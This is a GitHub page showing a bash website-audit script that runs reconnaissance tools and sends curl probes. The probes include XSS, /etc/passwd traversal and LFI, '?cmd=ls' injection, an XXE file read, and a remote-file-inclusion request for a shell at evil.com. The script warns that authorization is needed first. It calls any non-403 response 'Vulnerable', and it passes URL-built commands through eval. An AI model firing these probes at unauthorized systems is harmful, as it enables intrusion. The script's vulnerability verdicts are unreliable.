-
Notifications
You must be signed in to change notification settings - Fork 0
/
Copy pathisMyWebsiteInsecure-1.sh
258 lines (221 loc) · 9.11 KB
/
isMyWebsiteInsecure-1.sh
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
220
221
222
223
224
225
226
227
228
229
230
231
232
233
234
235
236
237
238
239
240
241
242
243
244
245
246
247
248
249
250
251
252
253
254
255
256
257
258
#!/bin/bash
# isMyWebsiteInsecure-1.sh
# developed by Oscar Azevedo, oscar.azevedo@aeportugal.pt, oscar.msazevedo@gmail.com
# v1.0
# check the security of a given website with public command line tools
# Function to validate URL format
validate_url() {
if [[ ! $1 =~ ^(http|https):// ]]; then
echo "Error: The provided parameter is not a valid URL. It should start with http:// or https://."
exit 1
fi
}
# Function to check if required tools are installed
check_tools() {
required_tools=(whois dnsrecon whatweb nc wpscan sqlmap curl nmap sslscan nrich dig)
for tool in "${required_tools[@]}"; do
if ! command -v $tool &> /dev/null; then
echo "$tool is not installed. Please install it before running the script."
exit 1
fi
done
}
# Main script
main() {
# Display ethical use warning
echo -e "\n\e[31mWarning: Ensure you have explicit authorization before running these tests. Unauthorized testing is illegal and unethical.\e[0m\n"
# Ask user if they want to continue
read -p "Do you want to continue running the script? (yes/no): " choice
if [[ "$choice" != "yes" ]]; then
echo "Exiting script."
exit 0
fi
# Check if a URL parameter is provided
if [ "$#" -ne 1 ]; then
echo -e "\e[32mUsage: $0 <url>\e[0m"
exit 1
fi
# Validate the URL format
url="$1"
validate_url "$url"
# Check if required tools are installed
check_tools
# Extract host and domain
host=$(echo "$url" | awk -F[/:] '{print $4}')
domain=$(echo "$host" | awk -F. '{if (NF>2) {print $(NF-1)"."$NF} else {print $0}}')
# Get the first IPv4 address from DNS
ipv4=$(dig +short "$host" | tail -n1)
echo
echo "Host=$host"
echo "Domain=$domain"
echo "IPv4=$ipv4"
echo "Url=$url"
echo
# WHOIS lookup for domain information
echo -e "\e[38;5;208m[+] Running WHOIS lookup...\e[0m"
echo -e "\e[32m sudo whois $domain \e[0m"
sudo whois $domain
echo -e "\n\n"
# DNS reconnaissance
echo -e "\e[38;5;208m[+] Running DNS reconnaissance...\e[0m"
echo -e "\e[32m dnsrecon -d $domain \e[0m"
dnsrecon -d $domain
echo -e "\n\n"
# SSL/TLS scan
echo -e "\e[38;5;208m[+] Running SSL/TLS scan...\e[0m"
echo -e "\e[32m sslscan $host \e[0m"
sslscan $host
echo -e "\n\n"
# HTTP Headers
echo -e "\e[38;5;208m[+] Getting HTTP Headers...\e[0m"
echo -e "\e[32m curl -I $url \e[0m"
curl -I $url
echo -e "\n\n"
# Identify technologies used on the website
echo -e "\e[38;5;208m[+] Identifying technologies used on the website...\e[0m"
echo -e "\e[32m whatweb $host \e[0m"
whatweb $host
echo -e "\n\n"
# Nmap Open Ports detection
echo -e "\e[38;5;208m[+] Running Nmap Open Ports detection...\e[0m"
echo -e "\e[32m nmap $host \e[0m"
nmap $host
echo -e "\n\n"
# Nmap Operating System detection
echo -e "\e[38;5;208m[+] Running Nmap Operating System detection...\e[0m"
echo -e "\e[32m sudo nmap -p 80,443 -O $host \e[0m"
sudo nmap -p 80,443 -O $host
echo -e "\n\n"
# Nmap Management detection
echo -e "\e[38;5;208m[+] Running Nmap Management detection...\e[0m"
echo -e "\e[32m nmap -sV -p 22,3389 $host \e[0m"
nmap -sV -p 22,3389 $host
echo -e "\n\n"
# Nmap Webserver detection
echo -e "\e[38;5;208m[+] Running Nmap Webserver detection...\e[0m"
echo -e "\e[32m nmap -sV -p 80,443 $host \e[0m"
nmap -sV -p 80,443 $host
echo -e "\n\n"
# Nmap Database detection
echo -e "\e[38;5;208m[+] Running Nmap Database detection...\e[0m"
echo -e "\e[32m nmap -sV -p 1433,3306,5432 $host \e[0m"
nmap -sV -p 1433,3306,5432 $host
echo -e "\n\n"
# PHP detection
echo -e "\e[38;5;208m[+] Detecting PHP...\e[0m"
echo -e "\e[32m nmap --script http-php-version $host \e[0m"
nmap --script http-php-version $host
echo -e "\n\n"
# phpMyAdmin detection
echo -e "\e[38;5;208m[+] Detecting phpMyAdmin...\e[0m"
echo -e "\e[32m nmap --script http-phpmyadmin-dir-traversal $host \e[0m"
nmap --script http-phpmyadmin-dir-traversal $host
echo -e "\n\n"
# Wordpress vulnerability scan
echo -e "\e[38;5;208m[+] Running Wordpress vulnerability scan...\e[0m"
echo -e "\e[32m sudo wpscan --update --no-banner --stealthy --url $url \e[0m"
sudo wpscan --update --no-banner --stealthy --url $url
echo -e "\n\n"
# Shodan scan
echo -e "\e[38;5;208m[+] Running Shodan scan...\e[0m"
echo -e "\e[32m echo $ipv4 | nrich - \e[0m"
echo $ipv4 | nrich -
echo -e "\n\n"
# XSS test
echo -e "\e[38;5;208m[+] Running XSS test...\e[0m"
xss_command="curl -s -o /dev/null -w \"%{http_code}\" -d \"<script>alert(1)</script>\" \"$url\""
echo -e "\e[32m${xss_command}\e[0m"
xss_status=$(eval $xss_command)
echo -e "XSS test: HTTP code: $xss_status"
if [ "$xss_status" -ne 403 ]; then
echo -e "\e[31m Vulnerable \e[0m"
fi
echo -e "\n\n"
# CSRF test
echo -e "\e[38;5;208m[+] Running CSRF test...\e[0m"
csrf_command="curl -s -o /dev/null -w \"%{http_code}\" -X POST -d \"param=value\" \"$url\""
echo -e "\e[32m${csrf_command}\e[0m"
csrf_status=$(eval $csrf_command)
echo -e "CSRF test: HTTP code: $csrf_status"
if [ "$csrf_status" -ne 403 ]; then
echo -e "\e[31mVulnerable\e[0m"
fi
echo -e "\n\n"
# Directory traversal test
echo -e "\e[38;5;208m[+] Running Directory traversal test...\e[0m"
dir_traversal_command="curl -s -o /dev/null -w \"%{http_code}\" \"$url/../../etc/passwd\""
echo -e "\e[32m${dir_traversal_command}\e[0m"
dir_traversal_status=$(eval $dir_traversal_command)
echo -e "Directory traversal test: HTTP code: $dir_traversal_status"
if [ "$dir_traversal_status" -ne 403 ]; then
echo -e "\e[31mVulnerable\e[0m"
fi
echo -e "\n\n"
# Command injection test
echo -e "\e[38;5;208m[+] Running Command injection test...\e[0m"
cmd_injection_command="curl -s -o /dev/null -w \"%{http_code}\" \"$url?cmd=ls\""
echo -e "\e[32m${cmd_injection_command}\e[0m"
cmd_injection_status=$(eval $cmd_injection_command)
echo -e "Command injection test: HTTP code: $cmd_injection_status"
if [ "$cmd_injection_status" -ne 403 ]; then
echo -e "\e[31mVulnerable\e[0m"
fi
echo -e "\n\n"
# Host header injection test
echo -e "\e[38;5;208m[+] Running Host header injection test...\e[0m"
host_header_injection_command="curl -s -o /dev/null -w \"%{http_code}\" -H \"Host: malicious.example.com\" \"$url\""
echo -e "\e[32m${host_header_injection_command}\e[0m"
host_header_injection_status=$(eval $host_header_injection_command)
echo -e "Host header injection test: HTTP code: $host_header_injection_status"
if [ "$host_header_injection_status" -ne 403 ]; then
echo -e "\e[31mVulnerable\e[0m"
fi
echo -e "\n\n"
# Path traversal test
echo -e "\e[38;5;208m[+] Running Path traversal test...\e[0m"
path_traversal_command="curl -s -o /dev/null -w \"%{http_code}\" \"$url/../../../../etc/passwd\""
echo -e "\e[32m${path_traversal_command}\e[0m"
path_traversal_status=$(eval $path_traversal_command)
echo -e "Path traversal test: HTTP code: $path_traversal_status"
if [ "$path_traversal_status" -ne 403 ]; then
echo -e "\e[31mVulnerable\e[0m"
fi
echo -e "\n\n"
# Local File Inclusion (LFI) test
echo -e "\e[38;5;208m[+] Running Local File Inclusion (LFI) test...\e[0m"
lfi_command="curl -s -o /dev/null -w \"%{http_code}\" \"$url?file=../../../../etc/passwd\""
echo -e "\e[32m${lfi_command}\e[0m"
lfi_status=$(eval $lfi_command)
echo -e "Local File Inclusion (LFI) test: HTTP code: $lfi_status"
if [ "$lfi_status" -ne 403 ]; then
echo -e "\e[31mVulnerable\e[0m"
fi
echo -e "\n\n"
# Remote File Inclusion (RFI) test
echo -e "\e[38;5;208m[+] Running Remote File Inclusion (RFI) test...\e[0m"
rfi_command="curl -s -o /dev/null -w \"%{http_code}\" \"$url?file=http://evil.com/shell.txt\""
echo -e "\e[32m${rfi_command}\e[0m"
rfi_status=$(eval $rfi_command)
echo -e "Remote File Inclusion (RFI) test: HTTP code: $rfi_status"
if [ "$rfi_status" -ne 403 ]; then
echo -e "\e[31mVulnerable\e[0m"
fi
echo -e "\n\n"
# XML External Entity (XXE) test
echo -e "\e[38;5;208m[+] Running XML External Entity (XXE) test...\e[0m"
xxe_command="curl -s -o /dev/null -w \"%{http_code}\" -d '<?xml version=\"1.0\" encoding=\"ISO-8859-1\"?><!DOCTYPE foo [ <!ELEMENT foo ANY > <!ENTITY xxe SYSTEM \"file:///etc/passwd\" >]><foo>&xxe;</foo>' \"$url\""
echo -e "\e[32m${xxe_command}\e[0m"
xxe_status=$(eval $xxe_command)
echo -e "XML External Entity (XXE) test: HTTP code: $xxe_status"
if [ "$xxe_status" -ne 403 ]; then
echo -e "\e[31mVulnerable\e[0m"
fi
echo -e "\n\n"
# Nmap vulnerabilities scan
echo -e "\e[38;5;208m[+] Nmap vulnerabilities scan...\e[0m"
echo -e "\e[32m nmap -sV -sC --script vuln $host \e[0m"
nmap -sV -sC --script vuln $host
echo -e "\n\n"
}
# Execute main function
main "$@"